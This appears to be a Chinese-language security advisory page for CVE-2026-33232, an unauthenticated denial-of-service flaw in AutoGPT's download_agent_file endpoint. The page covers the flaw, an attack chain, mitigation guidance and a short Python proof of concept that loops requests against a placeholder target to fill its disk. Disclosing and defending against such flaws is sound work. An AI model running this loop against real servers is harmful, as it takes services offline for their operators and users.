CVE-2026-33232 CVSS 7.5 高危

CVE-2026-33232 AutoGPT 未授权拒绝服务漏洞

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33232

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AutoGPT

漏洞概述

AutoGPT 平台 0.4.2 至 0.6.51 版本存在未经身份认证的拒绝服务漏洞。由于 `download_agent_file` 端点在处理请求后未能删除临时文件，攻击者可反复调用该接口耗尽服务器磁盘空间。这将导致数据库及其他服务因“无剩余空间”错误而崩溃，致使整个平台后端不可用。

技术细节

该漏洞的核心在于服务器端资源管理不当。AutoGPT 的 `download_agent_file` 端点在接收请求时，会创建持久化的临时文件以供下载，但在文件传输完成后，代码逻辑缺少清理机制，导致文件残留在磁盘上。由于该端点无需身份验证，攻击者可利用脚本持续发送恶意请求。随着请求量的累积，服务器磁盘空间将被迅速填满。当磁盘空间耗尽时，操作系统将抛出“No space left on device”错误，导致数据库服务挂起、日志无法记录、系统缓存失效等连锁反应。这种资源耗尽攻击不仅会导致 AutoGPT 应用层服务停止，还可能影响宿主机上运行的其他关键进程，从而引发全站的拒绝服务。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出运行在 0.4.2 至 0.6.51 版本的 AutoGPT 目标实例，并确认 `download_agent_file` 端点可访问。

STEP 2

2. 发起攻击

攻击者编写脚本，无需身份验证，向 `download_agent_file` 端点发送大量 HTTP 请求。

STEP 3

3. 资源耗尽

服务器为每个请求生成临时文件，但由于漏洞未在服务后删除，导致磁盘空间被逐渐占满。

STEP 4

4. 服务中断

磁盘空间耗尽导致数据库崩溃及系统写入失败，AutoGPT 平台及依赖该磁盘的其他服务停止响应，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL vulnerable to DoS via disk space exhaustion
target_url = "http://target-autogpt-instance.com/api/download_agent_file"

def exploit_dos():
    headers = {
        "User-Agent": "CVE-2026-33232-Scanner"
    }
    print("[+] Starting DoS attack on AutoGPT endpoint...")
    try:
        while True:
            # Send unauthenticated requests to consume disk space
            response = requests.get(target_url, headers=headers, timeout=10)
            if response.status_code == 200:
                print(f"[+] Request sent. Temporary file created. Disk space reducing...")
            else:
                print(f"[-] Request failed with status code: {response.status_code}")
    except KeyboardInterrupt:
        print("\n[-] Attack stopped by user.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    exploit_dos()

影响范围

AutoGPT 0.4.2 - 0.6.51

防御指南

临时缓解措施

建议立即将 AutoGPT 升级至 0.6.52 或更高版本以修复此漏洞。若无法立即升级，应在网络边界设备上实施 IP 限速策略，限制对 `download_agent_file` 端点的请求频率，或暂时禁用该功能接口，并定期手动检查并清理服务器上的临时文件目录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表